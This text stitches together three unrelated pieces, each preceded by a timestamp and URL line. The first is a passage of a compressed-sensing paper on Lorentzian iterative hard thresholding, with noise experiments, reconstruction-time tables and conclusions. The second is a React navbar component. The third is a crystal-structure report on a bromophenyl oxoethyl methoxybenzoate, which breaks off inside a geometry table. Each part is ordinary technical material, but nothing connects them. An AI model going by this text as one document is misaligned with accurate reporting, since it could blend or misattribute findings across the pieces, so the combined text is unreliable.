The second experiment explores the behavior of LIHT in very impulsive environments. We compare again against IHT and WMR, this time with $\alpha$-Stable sampling noise. The scale parameter of the noise is set as $\sigma=0.1$ for all cases and the tail parameter, $\alpha$, is varied from 0.2 to 2, *i.e.*, very impulsive to the Gaussian case, Figure \[Ch6fig:1\] (b). For small values of $\alpha$, all methods perform poorly, with LIHT yielding the most acceptable results. Beyond $\alpha=0.6$, LIHT produces faithful reconstructions with a SNR greater than 20 dB, and often 10 dB greater than IHT and WMR results. Notice that when $\alpha=2$ (Gaussian case) the performance of LIHT is comparable with that of IHT, which is least squares based. Also of note is that the SNRs achieved by LIHT-$\gamma_1$ and LIHT-$\gamma_2$ are almost identical, with LIHT-$\gamma_1$ slightly better.
(a)
(b)
For the next experiment, we evaluate the performance of LIHT as the number of measurements varies for different levels of impulsiveness. The number of measurements is varied from 16 (twice the sparsity level) to 512 (half the dimension of $x_0$). The sampling noise model used is $\alpha$-stable with four values of $\alpha$: 0.5, 1,1.5, 2. The results are summarized in Figure \[Ch6fig:2\], which show that, for $\alpha\in[1,2]$, LIHT yields fair reconstructions from 96 samples. However for $\alpha=0.5$ (most impulsive case of the four), more samples are needed, 256, to yield a fair reconstruction. Results of IHT with Gaussian noise ($\alpha=2$) are also included for comparison. Notice that the performance of LIHT is comparable to that of IHT for the Gaussian case. One remark is that LIHT needs more measurements, for a fixed sparsity level, than Lorentzian BP to yield an accurate reconstruction (see results in [@Carr10]). This is a general disadvantage of thresholding algorithms over $L_1$ minimization based methods [@Blu09].
The next experiment evaluates the computational speed of LIHT compared to the previously proposed Lorentizian BP. For this experiment we measure the reconstruction time required by the two algorithms for different signal lengths, $n=128, 256, 512, 1024, 2048$. We employ dense Gaussian sensing matrices (no fast matrix multiplication available) and fix $m=n/2$. Cauchy noise with $\sigma=0.1$ is added to the measurements. The sparsity level is fixed to $s=8$ for all signals lengths. The results are summarized in Table \[Ch6tab1\] with all times measured in seconds. All results are averaged over 200 realizations of the sensing matrix and the signals. The reconstruction times show that LIHT is at least three orders of magnitude faster than Lorentzian BP, with both algorithms being robust to impulsive noise. Thus, LIHT presents a fast alternative for sparse recovery in impulsive environments. One note is that the reconstruction times can be improved if structured sensing matrices that offer fast application of the sensing operator and its adjoint are used. Examples of these fast operators are the partial Fourier or Hadamard ensembles or binary sensing matrices.
n LBP LIHT
------ ---------- --------
2048 758.0145 0.1755
1024 116.5853 0.0730
512 26.3145 0.0426
256 8.7281 0.0102
128 3.3747 0.0059
: Reconstruction times (in seconds) for LIHT and Lorentzian BP, $m=n/2$.[]{data-label="Ch6tab1"}
The last experiment in this subsection shows the effectiveness of LIHT to recover real signals from corrupted measurements. We take random Hadamard measurements of the the $256\times 256$ ($n=65536$) Lena image and then add Cauchy distributed noise to the measurements. For all experiments we use the Daubechies Db8 wavelet transform as the sparsity basis and assume a sparsity level of $s=6000$. We fix the number of measurements as $m=32000$ and set the scale (dispersion) parameter of the Cauchy noise to $\sigma=1$. Figure \[Ch6Imex1\] shows the clean measurements on the top image and the Cauchy corrupted measurements in the bottom one.
We compare the reconstruction results of LIHT to those obtained by the classical LS-IHT algorithm, the LS-IHT with noise clipping and LS-IHT with the measurement rejection method proposed in [@Laska11]. To set a clipping rule we assume that we know before hand the the range of the clean measurements and all samples are clipped within this range, *i.e.* $$y_{i}^c = \left\{ \begin{array}{rcl}
-\lambda, & \mbox{ }& \text{if}~y_i\leq -\lambda \\
y_i, & \mbox{ }& \text{if}~|y_i| < \lambda \\
\lambda, & \mbox{ }& \text{if}~y_i\geq \lambda,
\end{array}\right.$$ where $y^c$ denotes the vector of clipped measurements. For the measurement rejection approach we adapt the framework in [@Laska11] to address impulsive noise rather than saturation noise. We discard large measurements and form a new measurement vector as $y^r=y_{S_r}$, where $S_r=\{i | |y_i| < \lambda\}$. To find the optimal $\lambda$ for both approaches we perform an exhaustive search. Table \[Ch6tab2\] presents the reconstruction results for different values of $\lambda$ in terms of $B$, where $B=\max_i|y_{0i}|$ and $y_0$ denotes the clean measurement vector. Thus, we select $\lambda=B$ for the clipping approach and $\lambda=0.5B$ for the measurement rejection approach. We also compare LIHT to the recovery of sparsely corrupted signals (RSCS) framework proposed in [@Studer12]. In this framework a sparse signal and error model is assumed and both signal and error are estimated at the same stage using an $L_1$ minimization problem with an augmented measurement matrix. In our experiments, we assume no signal/error support knowledge for RSCS. For LIHT we estimate $\gamma$ using equation .
$\lambda$ 0.5$B$ $B$ 2$B$ 3$B$ 4$B$ 5$B$
----------- -------- ------ ------ ------ ------ ------
Clipping -0.2 13.0 11.4 10.2 9.3 6.0
Rejection 16.2 15.4 14.4 13.4 12.8 10.9
: R-SNR (in db) for LS-IHT with clipping and rejection for different values of $\lambda$. $B=\max_i|y_{0i}|$.[]{data-label="Ch6tab2"}
Figure \[Ch6Imex2\] (a) shows the reconstructed image using LS-IHT, R-SNR=-5.3 dB. Figure \[Ch6Imex2\] (b) and \[Ch6Imex2\] (c) show the reconstructed images using LS-IHT with noise clipping, R-SNR=13.0 dB, and measurement rejection, R-SNR=16.2 dB, respectively. Figure \[Ch6Imex2\] (d) shows the reconstructed image by RSCS, R-SNR=17.16 dB and Figure \[Ch6Imex2\] (e) shows the reconstructed image using LIHT, R-SNR=19.8 dB. Figure \[Ch6Imex2\] (f) shows the reconstructed image from noiseless measurements using LS-IHT as comparison, R-SNR=22.8 dB. From the results it is clear that LIHT outperform the other approaches with a reconstruction quality about 3 dB worse than the noiseless reconstruction. We also evaluate the reconstruction quality of LIHT and the benchmark methods as the number of measurements is varied. Table \[Ch6tab3\] presents the results for four different number of measurements, $m=\{2s,3s,4s,5s\}$, where $s=6000$ is the sparsity level. The results show the advantage of robust operators in impulsive environments, especially when the number of measurements is limited.
$m$ 2$s$ 3$s$ 4$s$ 5$s$
----------- ------ ------ ------ ------
LS-IHT -8.5 -5.7 -5.5 -3.4
Clipping 3.9 8.9 9.9 11.5
Rejection 4.7 10.3 11.6 14.0
RSCS 4.8 10.9 11.9 16.8
LIHT 6.9 12.3 13.9 17.9
: Lena reconstruction results from Cauchy corrupted measurements. R-SNR (in db) as a function of $m$. $s=6000$.[]{data-label="Ch6tab3"}
LIHT with Partially Known Support
---------------------------------
Numerical experiments that illustrate the effectiveness of LIHT with partially known support are presented in this section. Results are presented for synthetic and real signals. In the real signal case, comparisons are made with a broad set of alternative algorithms.
Synthetic sparse vectors are employed in the first experiment. The signal length is set as $n=1000$ and the sparsity level is fixed to $50$. The nonzero coefficients are drawn from a Rademacher distribution, their position randomly chosen and amplitudes $\{-10,10\}$. The vectors are sampled using sensing matrices $\Phi$ that have i.i.d. entries drawn from a standard normal distribution with normalized columns. Each experiment is repeated 300 times, with average results presented.
The effect of including partial support knowledge is analyzed by increasing the cardinality of the known set in steps of $10\%$ for different numbers of measurements. The probability of exact reconstruction is employed as a measure of performance. Figure \[Ch6fig:PKS\] shows that, as expected, the reconstruction accuracy grows with the percentage of known support. The results also show that incorporating prior support information substantially reduces the number of measurements required for successful recovery.
The second experiment illustrates algorithm performance for real compressible signals. ECG signals are utilized due to the structure of their sparse decompositions. Experiments are carried out over 10-min long leads extracted from records 100, 101, 102, 103, 107, 109, 111, 115, 117, 118 and 119 from the MIT-BIH Arrhythmia Database (see [@Blanco08] and references therein). Cosine modulated filter banks are used to determine a sparse representation of the signal [@Blanco08]. A sparse signal approximation is determined by processing 1024 samples of ECG data, setting the number of channels, $M$, to 16, and selecting the largest 128 coefficients. This support set is denoted by $T$; note that $|T|=128$. Figure \[Ch6fig:ECG2\] shows an example of a decomposition of a lead of 1024 samples and its decomposition using CMFB.
Three cases are considered. In the first, the median (magnitude) support coefficient is determined and the coefficients of $T$ with magnitudes greater than or equal to the median are designated as the known signal support, *i.e.*, the positions of the largest (magnitude) 50% of $T$ coefficients are taken to be the known signal support. This case is denoted as IHT-PKS-I. The second partially known support case corresponds to those with magnitude less than the median, *i.e.*, the positions of the smallest (magnitude) 50% of $T$ coefficients since these might be the most difficult to find coefficients. This case is denoted as IHT-PKS-II. The third and final selection, denoted as IHT-PKS, is related to the low-pass approximation of the first subband, which corresponds to the first 64 coefficients (when $n=1024$). This first subband accumulates the majority of signal energy, which is the motivation for this case.
Figure \[Ch6fig:ECG\] compares the three proposed partially known support selections. Each method improves the performance over standard LIHT, except for IHT-PKS-II when the number of measurements is not sufficient to achieve accurate reconstruction. Note, however, that the performance of IHT-PKS-II improves rapidly as the number of measurements increases, with the method outperforming the other algorithms in this regime. The performance of IHT-PKS-I is very similar to IHT-PKS since most of the first subband low-pass approximation coefficients are included in the $50\%$ largest coefficients of $T$ set. Notice that IHT-PKS-I performs slightly better than IHT-PKS for small numbers of measurements.
Also compared with LIHT in Figure \[Ch6fig:ECG\] are the OMP, CoSaMP, and rwls-S$L_0$ iterative algorithms, as well as their partially known support versions (OMP-PKS, CoSaMP-PKS, and rwls-S$L_0$-PKS) [@Carr10c]. For reference, we also include Basis Pursuit (BP) and Basis Pursuit with partially known support (BP-PKS) [@Vaswani09]. In all cases, the positions of the first subband low-pass approximation coefficients are selected as the signal partially known support. Note that LIHT-PKS performs better than CoSaMP-PKS for small numbers of measurements and yields similar reconstructions when the number of measurements increases. Although the known support versions of the other iterative algorithms require fewer measurements to achieve accurate reconstructions, LIHT does not require the exact solution to an inverse problem, thus making it computationally more efficient. And as in the previous example, the performance of Lorentzian iterative hard thresholding is improved through the inclusion of partially known support information, thereby enabling the number of measurements requires for a specified level of performance to be reduced.
As a final example we illustrate how the partially known support framework can be applied in image reconstruction. Consider a wavelet decomposition of natural images. It is observed that the largest coefficients are concentrated in the approximation band and the remainder signal, detail coefficients, is a sparser signal than the original decomposition. Thus, a possible form to incorporate the partially known support framework is to assume that the approximation band coefficients are part of the true signal support, *i.e.*, the partially known support. To test our assumption we take random Hadamard measurements of the the $256\times 256$ Lena image and then we estimate the image from the measurements. Figure \[Ch6fig:Im2\] top left shows the original image. We use the Daubechies DB8 wavelet transform as our sparsity basis and we approximate the image with the largest $6000$ coefficients, thus $|T|=6000$. Figure \[Ch6fig:Im2\] top right shows the best $s$-term approximation, $s=6000$, with R-SNR=23.9 dB for comparison. We take $m=16000$ measurements and reconstruct the image using the LIHT algorithm and the LIHT-PKS algorithm. For LIHT-PKS we assume that the approximation band is in the true support of the image coefficients, $k=2048$ for this example. The reconstruction results are shown in Figure \[Ch6fig:Im2\] bottom left and Figure \[Ch6fig:Im2\] bottom right, respectively. The reconstruction SNRs are R-SNR=10.2 dB for the standard LIHT and R-SNR=20.4 dB for LIHT-PKS. The LIHT-PKS algorithm outperforms its counterpart without support knowledege by 10 dB, but more importantly, the partially known support reconstruction quality is 3 dB below the reconstruction quality obtained by the best $s$-term approximation.
Concluding Remarks {#sec:Ch6conc}
==================
This paper presents a Lorentzian based IHT algorithm for recovery of sparse signals in impulsive environments. The derived algorithm is comparable to least squares based IHT in terms of computational load, with the advantage of robustness against heavy-tailed impulsive noise. Sufficient conditions for stability are studied and a reconstruction error bound is derived that depends on the noise strength and a tunable parameter of the Lorentzian norm. Simulations results show that the LIHT algorithm yields comparable performance with state of the art algorithms in light-tailed environments while having substantial performance improvements in heavy-tailed environments. Simulation results also show that LIHT is a fast reconstruction algorithm with scalability for large dimensional problems. Methods to estimate the adjustable parameters in the reconstruction algorithm are proposed, although computation of their optimal values remains an open question. Future work will focus on convergence analysis of the proposed algorithm.
Additionally, this paper proposes a modification of the LIHT algorithm that incorporates known support in the recovery process. Sufficient conditions for stable recovery in the compressed sensing with partially known support problem are derived. The theoretical analysis shows that including prior support information relaxes the conditions for successful reconstruction. Numerical results show that the modified LIHT improves performance, thereby requiring fewer samples to yield an approximate reconstruction.
[^1]: R.E. Carrillo was with the Department of Electrical and Computer Engineering, University of Delaware, Newark, DE 19716 USA. He is now with the Institute of Electrical Engineering, [É]{}cole Polytechnique F[é]{}d[é]{}rale de Lausanne (EPFL), CH-1015 Lausanne, Switzerland. E-mail: rafael.carrillo@epfl.ch. K.E. Barner is with the Department of Electrical and Computer Engineering, University of Delaware, Newark, DE 19716 USA. E-mail: barner@eecis.udel.edu.
| 2023-10-08T01:27:15.642919 | https://example.com/article/3439 |
import React from 'react';
import PropTypes from 'prop-types';
import { Link } from 'react-router-dom';
import {
Avatar,
AvatarAddOn,
Button,
DropdownToggle,
NavbarThemeProvider,
Navbar,
NavbarBrand,
Nav,
NavItem,
NavLink,
NavbarToggler,
UncontrolledCollapse,
UncontrolledDropdown,
} from './../../../components';
import { NavbarActivityFeed } from './../../../layout/components/NavbarActivityFeed';
import { NavbarMessages } from './../../../layout/components/NavbarMessages';
import { NavbarUser } from './../../../layout/components/NavbarUser';
import { NavbarNavigation } from './NavbarNavigation';
import { DropdownProfile } from './../Dropdowns/DropdownProfile';
import { randomAvatar } from './../../../utilities';
const NavbarExample = ({ themeColor, themeStyle, navStyle }) => {
return (
<NavbarThemeProvider style={ themeStyle } color={ themeColor } className="shadow-sm">
<Navbar expand="lg" themed>
<Link to="/">
<NavbarBrand className="mb-0" tag="div">
react.bs4
</NavbarBrand>
</Link>
<Nav pills>
<NavItem>
<NavLink tag={ NavbarToggler } id="navbar-navigation-toggler" className="b-0">
<i className="fa fa-fw fa-bars"></i>
</NavLink>
</NavItem>
</Nav>
{ /* Navigation with Collapse */ }
<UncontrolledCollapse navbar toggler="#navbar-navigation-toggler">
<NavbarNavigation
pills={ navStyle === 'pills' }
accent={ navStyle === 'accent' }
/>
</UncontrolledCollapse>
{ /* END Navbar: Left Side */ }
{ /* START Navbar: Right Side */ }
<Nav className="ml-auto" pills>
<NavbarMessages />
<NavbarActivityFeed />
{ /* START Navbar: Dropdown */ }
<UncontrolledDropdown nav inNavbar>
<DropdownToggle nav>
<Avatar.Image
size="sm"
src={ randomAvatar() }
addOns={[
<AvatarAddOn.Icon
className="fa fa-circle"
color="white"
key="avatar-icon-bg"
/>,
<AvatarAddOn.Icon
className="fa fa-circle"
color="danger"
key="avatar-icon-fg"
/>
]}
/>
</DropdownToggle>
<DropdownProfile
right
/>
</UncontrolledDropdown>
{ /* END Navbar: Dropdown */ }
<NavbarUser className="d-none d-lg-block" />
</Nav>
{ /* END Navbar: Right Side */ }
</Navbar>
<Navbar light expand="lg" className="py-3 bg-white">
<h1 className="mb-0 h4">
Navbar Only
</h1>
<Button color={ themeColor } className="px-4 my-sm-0">
Download <i className="fa ml-1 fa-fw fa-download"></i>
</Button>
</Navbar>
</NavbarThemeProvider>
);
}
NavbarExample.propTypes = {
navStyle: PropTypes.oneOf(['pills', 'accent', 'default']),
themeStyle: PropTypes.string,
themeColor: PropTypes.string,
};
NavbarExample.defaultProps = {
navStyle: 'default',
themeStyle: 'dark',
themeColor: 'primary'
};
export { NavbarExample };
| 2024-06-16T01:27:15.642919 | https://example.com/article/6918 |
Related literature {#sec1}
==================
For general background to and applications of phenacyl benzoate derivatives, see: Rather & Reid (1919[@bb6]); Sheehan & Umezaw (1973[@bb8]); Ruzicka *et al.* (2002[@bb7]); Litera *et al.* (2006[@bb5]); Huang *et al.* (1996[@bb4]); Gandhi *et al.* (1995[@bb3]). For standard bond-length data, see: Allen *et al.* (1987[@bb1]).
Experimental {#sec2}
============
{#sec2.1}
### Crystal data {#sec2.1.1}
C~16~H~13~BrO~4~*M* *~r~* = 349.17Orthorhombic,*a* = 7.8424 (5) Å*b* = 14.6799 (9) Å*c* = 25.7677 (14) Å*V* = 2966.5 (3) Å^3^*Z* = 8Mo *K*α radiationμ = 2.78 mm^−1^*T* = 296 K0.56 × 0.25 × 0.12 mm
### Data collection {#sec2.1.2}
Bruker SMART APEXII DUO CCD area-detector diffractometerAbsorption correction: multi-scan (*SADABS*; Bruker, 2009[@bb2]) *T* ~min~ = 0.306, *T* ~max~ = 0.73319358 measured reflections4731 independent reflections2916 reflections with *I* \> 2σ(*I*)*R* ~int~ = 0.035
### Refinement {#sec2.1.3}
*R*\[*F* ^2^ \> 2σ(*F* ^2^)\] = 0.037*wR*(*F* ^2^) = 0.095*S* = 1.004731 reflections190 parametersH-atom parameters constrainedΔρ~max~ = 0.51 e Å^−3^Δρ~min~ = −0.54 e Å^−3^
{#d5e433}
Data collection: *APEX2* (Bruker, 2009[@bb2]); cell refinement: *SAINT* (Bruker, 2009[@bb2]); data reduction: *SAINT*; program(s) used to solve structure: *SHELXTL* (Sheldrick, 2008[@bb9]); program(s) used to refine structure: *SHELXTL*; molecular graphics: *SHELXTL*; software used to prepare material for publication: *SHELXTL* and *PLATON* (Spek, 2009[@bb10]).
Supplementary Material
======================
Crystal structure: contains datablock(s) global, I. DOI: [10.1107/S1600536811023002/lh5263sup1.cif](http://dx.doi.org/10.1107/S1600536811023002/lh5263sup1.cif)
Structure factors: contains datablock(s) I. DOI: [10.1107/S1600536811023002/lh5263Isup2.hkl](http://dx.doi.org/10.1107/S1600536811023002/lh5263Isup2.hkl)
Supplementary material file. DOI: [10.1107/S1600536811023002/lh5263Isup3.cml](http://dx.doi.org/10.1107/S1600536811023002/lh5263Isup3.cml)
Additional supplementary materials: [crystallographic information](http://scripts.iucr.org/cgi-bin/sendsupfiles?lh5263&file=lh5263sup0.html&mime=text/html); [3D view](http://scripts.iucr.org/cgi-bin/sendcif?lh5263sup1&Qmime=cif); [checkCIF report](http://scripts.iucr.org/cgi-bin/paper?lh5263&checkcif=yes)
Supplementary data and figures for this paper are available from the IUCr electronic archives (Reference: [LH5263](http://scripts.iucr.org/cgi-bin/sendsup?lh5263)).
HKF and CKQ thank Universiti Sains Malaysia (USM) for the Research University Grant (No. 1001/PFIZIK/811160). AMI is thankful to the Department of Atomic Energy, Board for Research in Nuclear Sciences, Government of India, for the Young scientist award. GB thanks the Department of Information Technology, New Delhi, India, for financial support.
Comment
=======
Phenacyl benzoates derivatives are very important in the identification of organic acids (Rather & Reid, 1919). They undergo photolysis in neutral and mild conditions (Sheehan & Umezaw, 1973; Ruzicka *et al.*, 2002; Litera *et al.*, 2006). They find applications in the field of synthetic chemistry for the synthesis of oxazoles, imidazoles (Huang *et al.*, 1996), benzoxazepine (Gandhi *et al.*, 1995). We report herein the crystal structure of 2-(4-bromophenyl)-2-oxoethyl 2-methoxybenzoate which is potentially of commercial importance.
The molecular structure of the title compound is shown in Fig. 1. The benzene rings (C1-C6 and C10-C15) form a dihedral angle of 85.92 (10) ° . Bond lengths (Allen *et al.*, 1987) and angles are within normal ranges. In the crystal (Fig. 2), the molecules are linked into one-dimensional chains along \[100\] *via* weak intermolecular C2--H2A···O1^i^ hydrogen bonds (Table 1).
Experimental {#experimental}
============
A mixture of 2-methoxybenzoic acid (1.00 g, 0.0065 mol) potassium carbonate (0.98 g, 0.0071 mol) and 2-bromo-1-(4-bromophenyl)ethanone (1.80 g, 0.0065 mol) in dimethylformamide (10 ml) was stirred at room temperature for 2 h. On cooling, colorless needle shaped crystals of 2-(4-bromophenyl)-2-oxoethyl 2-methoxybenzoate began to separate. These were collected by filtration and recrystallized from ethanol. Yield: 2.15 g, 93.8 %, *m.p.* : 388-389 K.
Refinement {#refinement}
==========
All H atoms were positioned geometrically and refined using a riding model with C---H = 0.93 -- 0.96 Å and U~iso~(H) = 1.2 or 1.5 U~eq~(C). The highest residual electron density peak is located at 0.79 Å and the deepest hole is located at 0.78 Å from Br1, respectively.
Figures
=======
{#Fap1}
{#Fap2}
Crystal data {#tablewrapcrystaldatalong}
============
------------------------- ---------------------------------------
C~16~H~13~BrO~4~ *F*(000) = 1408
*M~r~* = 349.17 *D*~x~ = 1.564 Mg m^−3^
Orthorhombic, *Pbca* Mo *K*α radiation, λ = 0.71073 Å
Hall symbol: -P 2ac 2ab Cell parameters from 3938 reflections
*a* = 7.8424 (5) Å θ = 2.8--26.5°
*b* = 14.6799 (9) Å µ = 2.78 mm^−1^
*c* = 25.7677 (14) Å *T* = 296 K
*V* = 2966.5 (3) Å^3^ Needle, colourless
*Z* = 8 0.56 × 0.25 × 0.12 mm
------------------------- ---------------------------------------
Data collection {#tablewrapdatacollectionlong}
===============
------------------------------------------------------------ --------------------------------------
Bruker SMART APEXII DUO CCD area-detector diffractometer 4731 independent reflections
Radiation source: fine-focus sealed tube 2916 reflections with *I* \> 2σ(*I*)
graphite *R*~int~ = 0.035
φ and ω scans θ~max~ = 31.0°, θ~min~ = 2.8°
Absorption correction: multi-scan (*SADABS*; Bruker, 2009) *h* = −11→11
*T*~min~ = 0.306, *T*~max~ = 0.733 *k* = −21→14
19358 measured reflections *l* = −37→37
------------------------------------------------------------ --------------------------------------
Refinement {#tablewraprefinementdatalong}
==========
------------------------------------- -------------------------------------------------------------------------------------------------
Refinement on *F*^2^ Primary atom site location: structure-invariant direct methods
Least-squares matrix: full Secondary atom site location: difference Fourier map
*R*\[*F*^2^ \> 2σ(*F*^2^)\] = 0.037 Hydrogen site location: inferred from neighbouring sites
*wR*(*F*^2^) = 0.095 H-atom parameters constrained
*S* = 1.00 *w* = 1/\[σ^2^(*F*~o~^2^) + (0.0329*P*)^2^ + 1.2401*P*\] where *P* = (*F*~o~^2^ + 2*F*~c~^2^)/3
4731 reflections (Δ/σ)~max~ = 0.001
190 parameters Δρ~max~ = 0.51 e Å^−3^
0 restraints Δρ~min~ = −0.54 e Å^−3^
------------------------------------- -------------------------------------------------------------------------------------------------
Special details {#specialdetails}
===============
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Geometry. All esds (except the esd in the dihedral angle between two l.s. planes) are estimated using the full covariance matrix. The cell esds are taken into account individually in the estimation of esds in distances, angles and torsion angles; correlations between esds in cell parameters are only used when they are defined by crystal symmetry. An approximate (isotropic) treatment of cell esds is used for estimating esds involving l.s. planes.
Refinement. Refinement of F^2^ against ALL reflections. The weighted R-factor wR and goodness of fit S are based on F^2^, conventional R-factors R are based on F, with F set to zero for negative F^2^. The threshold expression of F^2^ \> 2sigma(F^2^) is used only for calculating R-factors(gt) etc. and is not relevant to the choice of reflections for refinement. R-factors based on F^2^ are statistically about twice as large as those based on F, and R- factors based on ALL data will be even larger.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Fractional atomic coordinates and isotropic or equivalent isotropic displacement parameters (Å^2^) {#tablewrapcoords}
==================================================================================================
------ -------------- --------------- --------------- -------------------- --
*x* *y* *z* *U*~iso~\*/*U*~eq~
Br1 1.19995 (4) 0.063553 (17) 0.603716 (11) 0.07024 (11)
O1 0.4583 (2) 0.13020 (14) 0.46925 (7) 0.0717 (5)
O2 0.4899 (2) 0.19606 (9) 0.37415 (6) 0.0579 (4)
O3 0.4628 (2) 0.04790 (10) 0.35626 (6) 0.0604 (4)
O4 0.19571 (19) 0.00663 (10) 0.29651 (6) 0.0544 (4)
C1 0.9183 (3) 0.14467 (14) 0.47702 (8) 0.0488 (5)
H1A 0.9406 0.1695 0.4445 0.059\*
C2 1.0517 (3) 0.12695 (15) 0.51036 (8) 0.0517 (5)
H2A 1.1635 0.1396 0.5007 0.062\*
C3 1.0158 (3) 0.09006 (13) 0.55825 (8) 0.0487 (5)
C4 0.8516 (3) 0.07055 (14) 0.57344 (8) 0.0538 (5)
H4A 0.8302 0.0457 0.6060 0.065\*
C5 0.7199 (3) 0.08825 (15) 0.53991 (8) 0.0504 (5)
H5A 0.6087 0.0749 0.5498 0.060\*
C6 0.7504 (3) 0.12584 (13) 0.49133 (7) 0.0428 (4)
C7 0.6034 (3) 0.14284 (14) 0.45588 (8) 0.0470 (4)
C8 0.6423 (3) 0.17663 (14) 0.40202 (8) 0.0496 (5)
H8A 0.7113 0.2313 0.4042 0.059\*
H8B 0.7073 0.1308 0.3835 0.059\*
C9 0.4043 (3) 0.12319 (13) 0.35557 (7) 0.0444 (4)
C10 0.2356 (3) 0.15108 (13) 0.33476 (7) 0.0420 (4)
C11 0.1753 (3) 0.23898 (15) 0.34381 (8) 0.0540 (5)
H11A 0.2411 0.2790 0.3633 0.065\*
C12 0.0207 (3) 0.26793 (17) 0.32457 (9) 0.0654 (6)
H12A −0.0176 0.3268 0.3311 0.078\*
C13 −0.0762 (3) 0.20873 (18) 0.29561 (9) 0.0643 (6)
H13A −0.1803 0.2280 0.2823 0.077\*
C14 −0.0216 (3) 0.12187 (16) 0.28619 (8) 0.0551 (5)
H14A −0.0894 0.0827 0.2668 0.066\*
C15 0.1337 (3) 0.09149 (13) 0.30522 (7) 0.0442 (4)
C16 0.0967 (4) −0.05475 (17) 0.26574 (11) 0.0735 (7)
H16A 0.1556 −0.1118 0.2627 0.110\*
H16B 0.0799 −0.0292 0.2318 0.110\*
H16C −0.0120 −0.0644 0.2820 0.110\*
------ -------------- --------------- --------------- -------------------- --
Atomic displacement parameters (Å^2^) {#tablewrapadps}
=====================================
----- -------------- -------------- -------------- -------------- --------------- ---------------
*U*^11^ *U*^22^ *U*^33^ *U*^12^ *U*^13^ *U*^23^
Br1 0.07526 (19) 0.05554 (15) 0.07991 (18) 0.00639 (12) −0.03345 (13) −0.00558 (11)
O1 0.0385 (8) 0.1055 (14) 0.0713 (10) −0.0059 (9) 0.0015 (8) −0.0039 (10)
O2 0.0574 (9) 0.0434 (8) 0.0729 (9) −0.0015 (7) −0.0214 (8) 0.0012 (7)
O3 0.0584 (9) 0.0481 (8) 0.0746 (10) 0.0109 (7) −0.0218 (8) −0.0110 (7)
O4 0.0577 (9) 0.0459 (7) 0.0595 (8) −0.0012 (7) −0.0141 (7) −0.0071 (6)
C1 0.0433 (11) 0.0560 (11) 0.0472 (10) −0.0059 (10) 0.0009 (9) −0.0014 (9)
C2 0.0372 (10) 0.0562 (12) 0.0617 (12) −0.0049 (9) −0.0018 (9) −0.0084 (10)
C3 0.0535 (12) 0.0381 (9) 0.0544 (11) 0.0025 (9) −0.0136 (10) −0.0098 (8)
C4 0.0634 (14) 0.0506 (11) 0.0474 (10) −0.0032 (11) −0.0006 (10) −0.0014 (9)
C5 0.0430 (11) 0.0542 (11) 0.0540 (11) −0.0053 (10) 0.0062 (9) −0.0046 (9)
C6 0.0381 (9) 0.0421 (10) 0.0481 (10) −0.0023 (8) 0.0013 (8) −0.0093 (8)
C7 0.0398 (11) 0.0466 (10) 0.0547 (11) −0.0035 (9) −0.0017 (9) −0.0102 (8)
C8 0.0444 (11) 0.0434 (10) 0.0608 (12) −0.0064 (9) −0.0111 (9) 0.0010 (9)
C9 0.0505 (12) 0.0430 (10) 0.0398 (9) 0.0012 (9) −0.0048 (8) −0.0011 (8)
C10 0.0453 (10) 0.0437 (9) 0.0371 (8) 0.0042 (8) −0.0024 (8) 0.0010 (7)
C11 0.0603 (14) 0.0510 (11) 0.0508 (11) 0.0078 (10) −0.0030 (10) −0.0057 (9)
C12 0.0679 (15) 0.0613 (14) 0.0671 (14) 0.0228 (13) −0.0041 (12) −0.0009 (11)
C13 0.0505 (13) 0.0780 (16) 0.0646 (13) 0.0163 (12) −0.0071 (11) 0.0099 (12)
C14 0.0486 (12) 0.0654 (14) 0.0513 (11) −0.0005 (11) −0.0093 (10) 0.0052 (10)
C15 0.0475 (11) 0.0490 (10) 0.0362 (8) 0.0017 (9) 0.0003 (8) 0.0040 (7)
C16 0.0819 (18) 0.0597 (14) 0.0788 (16) −0.0071 (13) −0.0264 (15) −0.0160 (11)
----- -------------- -------------- -------------- -------------- --------------- ---------------
Geometric parameters (Å, °) {#tablewrapgeomlong}
===========================
-------------------- -------------- ----------------------- --------------
Br1---C3 1.900 (2) C7---C8 1.505 (3)
O1---C7 1.203 (3) C8---H8A 0.9700
O2---C9 1.351 (2) C8---H8B 0.9700
O2---C8 1.423 (2) C9---C10 1.485 (3)
O3---C9 1.197 (2) C10---C11 1.394 (3)
O4---C15 1.356 (2) C10---C15 1.408 (3)
O4---C16 1.430 (3) C11---C12 1.377 (3)
C1---C2 1.378 (3) C11---H11A 0.9300
C1---C6 1.395 (3) C12---C13 1.375 (3)
C1---H1A 0.9300 C12---H12A 0.9300
C2---C3 1.377 (3) C13---C14 1.367 (3)
C2---H2A 0.9300 C13---H13A 0.9300
C3---C4 1.376 (3) C14---C15 1.386 (3)
C4---C5 1.371 (3) C14---H14A 0.9300
C4---H4A 0.9300 C16---H16A 0.9600
C5---C6 1.389 (3) C16---H16B 0.9600
C5---H5A 0.9300 C16---H16C 0.9600
C6---C7 1.492 (3)
C9---O2---C8 115.94 (15) H8A---C8---H8B 108.0
C15---O4---C16 118.42 (17) O3---C9---O2 122.39 (19)
C2---C1---C6 120.95 (19) O3---C9---C10 126.97 (18)
C2---C1---H1A 119.5 O2---C9---C10 110.63 (16)
C6---C1---H1A 119.5 C11---C10---C15 118.24 (19)
C3---C2---C1 118.55 (19) C11---C10---C9 119.80 (18)
C3---C2---H2A 120.7 C15---C10---C9 121.96 (17)
C1---C2---H2A 120.7 C12---C11---C10 121.6 (2)
C4---C3---C2 121.9 (2) C12---C11---H11A 119.2
C4---C3---Br1 119.56 (16) C10---C11---H11A 119.2
C2---C3---Br1 118.56 (17) C13---C12---C11 119.2 (2)
C5---C4---C3 119.1 (2) C13---C12---H12A 120.4
C5---C4---H4A 120.5 C11---C12---H12A 120.4
C3---C4---H4A 120.5 C14---C13---C12 120.8 (2)
C4---C5---C6 120.9 (2) C14---C13---H13A 119.6
C4---C5---H5A 119.5 C12---C13---H13A 119.6
C6---C5---H5A 119.5 C13---C14---C15 120.8 (2)
C5---C6---C1 118.64 (19) C13---C14---H14A 119.6
C5---C6---C7 119.04 (18) C15---C14---H14A 119.6
C1---C6---C7 122.30 (18) O4---C15---C14 123.50 (19)
O1---C7---C6 121.99 (19) O4---C15---C10 117.17 (17)
